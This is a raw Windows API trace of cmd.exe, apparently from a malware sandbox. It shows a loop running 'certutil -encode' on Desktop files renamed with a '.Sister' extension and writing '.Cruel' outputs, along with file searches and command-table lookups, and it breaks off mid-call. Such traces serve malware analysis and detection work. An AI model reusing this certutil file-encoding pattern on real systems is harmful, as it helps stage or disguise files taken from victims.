[0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.754] GetProcessHeap () returned 0x21ed8c70000 [0220.755] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45cb0) returned 1 [0220.755] GetProcessHeap () returned 0x21ed8c70000 [0220.755] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95ae0 [0220.755] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0220.755] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.755] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0220.755] _get_osfhandle (_FileHandle=0) returned 0x4c [0220.850] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0220.926] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xce0, dwThreadId=0xdc8)) returned 1 [0220.938] CloseHandle (hObject=0xa4) returned 1 [0220.939] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0220.939] GetProcessHeap () returned 0x21ed8c70000 [0220.939] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0220.939] GetEnvironmentStringsW () returned 0x21ed9980080* [0220.939] GetProcessHeap () returned 0x21ed8c70000 [0220.939] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0220.939] FreeEnvironmentStringsA (penv="=") returned 1 [0220.939] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0223.215] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0223.215] CloseHandle (hObject=0xa8) returned 1 [0223.216] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0223.216] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.216] GetProcessHeap () returned 0x21ed8c70000 [0223.216] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0223.216] GetEnvironmentStringsW () returned 0x21ed9980080* [0223.216] GetProcessHeap () returned 0x21ed8c70000 [0223.216] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0223.216] FreeEnvironmentStringsA (penv="=") returned 1 [0223.216] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.216] GetProcessHeap () returned 0x21ed8c70000 [0223.216] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0223.216] GetEnvironmentStringsW () returned 0x21ed9980080* [0223.216] GetProcessHeap () returned 0x21ed8c70000 [0223.216] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0223.217] FreeEnvironmentStringsA (penv="=") returned 1 [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95ae0) returned 1 [0223.217] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0223.217] ??_V@YAXPEAX@Z () returned 0x1 [0223.217] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4497c0, ftCreationTime.dwHighDateTime=0x1d5ed5b, ftLastAccessTime.dwLowDateTime=0x7a16bb0, ftLastAccessTime.dwHighDateTime=0x1d5ecdb, ftLastWriteTime.dwLowDateTime=0x7a16bb0, ftLastWriteTime.dwHighDateTime=0x1d5ecdb, nFileSizeHigh=0x0, nFileSizeLow=0x18833, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="gwc793WO9abijU0o.flv.Sister", cAlternateFileName="")) returned 1 [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66bd0, Size=0x27a) returned 0x21ed8d66bd0 [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66bd0) returned 0x27a [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68120 [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68120, Size=0x58) returned 0x21ed8d68120 [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68120) returned 0x58 [0223.217] GetProcessHeap () returned 0x21ed8c70000 [0223.217] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68190 [0223.217] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0223.218] GetProcessHeap () returned 0x21ed8c70000 [0223.218] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bdf0 [0223.218] ??_V@YAXPEAX@Z () returned 0x1 [0223.218] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0223.218] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0223.218] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0223.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0223.219] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0223.219] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xaf3b01a9, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xaf3b01a9, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0223.219] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0223.219] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4497c0, ftCreationTime.dwHighDateTime=0x1d5ed5b, ftLastAccessTime.dwLowDateTime=0x7a16bb0, ftLastAccessTime.dwHighDateTime=0x1d5ecdb, ftLastWriteTime.dwLowDateTime=0x7a16bb0, ftLastWriteTime.dwHighDateTime=0x1d5ecdb, nFileSizeHigh=0x0, nFileSizeLow=0x18833, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="gwc793WO9abijU0o.flv.Sister", cAlternateFileName="GWC793~1.SIS")) returned 0x21ed8c7cdc0 [0223.219] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0223.219] _wcsnicmp (_String1="GWC793~1.SIS", _String2="gwc793WO9abijU0o.flv.Sister", _MaxCount=0x1b) returned 7 [0223.219] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0223.219] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0223.219] GetProcessHeap () returned 0x21ed8c70000 [0223.219] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7c070 [0223.220] ??_V@YAXPEAX@Z () returned 0x1 [0223.220] ??_V@YAXPEAX@Z () returned 0x1 [0223.220] GetProcessHeap () returned 0x21ed8c70000 [0223.220] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68190, Size=0x230) returned 0x21ed8d68190 [0223.220] GetProcessHeap () returned 0x21ed8c70000 [0223.220] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68190) returned 0x230 [0223.220] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0223.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.220] GetFileType (hFile=0x50) returned 0x2 [0223.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0223.220] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0223.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.328] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0223.403] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0223.403] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0223.403] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0223.403] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0223.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.403] GetFileType (hFile=0x50) returned 0x2 [0223.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0223.403] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0223.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.473] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0223.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.630] GetFileType (hFile=0x50) returned 0x2 [0223.630] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0223.630] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0223.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.700] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d68130*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d68130*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0223.773] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\" ") returned 68 [0223.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.774] GetFileType (hFile=0x50) returned 0x2 [0223.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0223.774] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0223.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.855] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0223.959] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0223.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.960] GetFileType (hFile=0x50) returned 0x2 [0223.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0223.960] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0224.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0224.077] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0224.162] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0224.308] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0224.308] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0224.308] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0224.308] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0224.308] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0224.308] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0224.308] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0224.308] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0224.308] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0224.308] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0224.308] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0224.308] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0224.308] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0224.308] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0224.308] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0224.308] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0224.308] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0224.309] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0224.309] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0224.309] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0224.309] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0224.309] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0224.309] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0224.309] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0224.309] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0224.309] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0224.309] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0224.309] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0224.309] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0224.309] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0224.309] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0224.309] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0224.309] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0224.309] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0224.309] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0224.309] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0224.309] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0224.309] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0224.309] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0224.309] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0224.309] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0224.309] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0224.310] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0224.310] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0224.310] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0224.310] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0224.310] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0224.310] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0224.310] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0224.310] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0224.310] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0224.310] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0224.310] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0224.310] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0224.310] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0224.310] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0224.310] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0224.310] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0224.310] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0224.310] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0224.310] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0224.310] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0224.310] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0224.310] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0224.310] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0224.310] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0224.310] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0224.310] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0224.310] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0224.310] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0224.310] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0224.311] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0224.311] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0224.311] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0224.311] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0224.311] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0224.311] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0224.311] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0224.311] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0224.311] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0224.311] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0224.311] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0224.311] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0224.311] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0224.311] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0224.311] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0224.311] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0224.311] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0224.311] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0224.311] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0224.311] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0224.311] ??_V@YAXPEAX@Z () returned 0x1 [0224.312] GetProcessHeap () returned 0x21ed8c70000 [0224.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cf98e0 [0224.312] GetProcessHeap () returned 0x21ed8c70000 [0224.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96640 [0224.312] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0224.312] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0224.312] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0224.312] GetProcessHeap () returned 0x21ed8c70000 [0224.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8d098d0 [0224.313] SetErrorMode (uMode=0x0) returned 0x0 [0224.313] SetErrorMode (uMode=0x1) returned 0x0 [0224.313] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8d098e0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0224.313] SetErrorMode (uMode=0x0) returned 0x1 [0224.313] GetProcessHeap () returned 0x21ed8c70000 [0224.313] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d098d0, Size=0x52) returned 0x21ed8d098d0 [0224.313] GetProcessHeap () returned 0x21ed8c70000 [0224.313] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d098d0) returned 0x52 [0224.314] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0224.314] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5eb60 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c75e00 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75e00, Size=0x1be) returned 0x21ed8c75e00 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75e00) returned 0x1be [0224.314] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d429a0 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d429a0, Size=0x7e) returned 0x21ed8d429a0 [0224.314] GetProcessHeap () returned 0x21ed8c70000 [0224.314] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d429a0) returned 0x7e [0224.314] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.314] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0224.315] GetLastError () returned 0x2 [0224.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.316] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0224.316] GetLastError () returned 0x2 [0224.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.316] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cfa0 [0224.317] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0224.317] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0224.317] GetLastError () returned 0x2 [0224.317] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 